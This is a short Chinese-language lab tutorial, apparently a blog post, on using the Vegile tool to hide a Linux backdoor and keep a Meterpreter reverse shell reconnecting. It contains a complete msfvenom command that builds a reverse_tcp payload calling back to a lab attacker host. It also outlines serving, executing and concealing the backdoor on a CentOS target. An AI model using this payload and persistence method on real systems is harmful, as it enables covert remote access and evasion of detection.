Vegile实现linux后门隐藏

Vegile是linux中的权限维持工具。主要用来隐藏后门、和无限循环连接meterpreter来保持回话。

实验环境：
1.attack：kali 192.168.72.131
2.target：centos7 192.168.72.132
3.Vegile、metasploit

一、前期准备
将Vegile上传到kali的 /var/www/html下


kali生成后门程序保存到/var/www/html下

aaa@qq.com:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.72.131  LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor

二、metasploit监听
运行exploit/multi/handler，配置反弹地址、端口，开启监听。

三、攻击
下载Vegile和后门程序、执行程序

下载的时候出现以上问题是因为没有开启Apache导致的，只要开启就行了。

这样就靶机就可以正常下载了。

因为vegile是zip压缩包，所以需要解压。

这样就下载好了vegile和后门backdoor，接下来就提高他们的执行权限。用vegile来执行后门。

然后返回kali中去看是否攻击成功。

四、测试后门是否隐藏成功
删除Vegile及后门程序，检验是否还可以连接后门

注：
1.后门一定要放到Vegile目录下
2.上传Vegile可以用shell来上传
3.为了不来回切换界面，可以使用命令终端ssh远程连接centos7
4.chmod +x 提升授权，我自己常写错成 chmod -x。

vegile查看帮助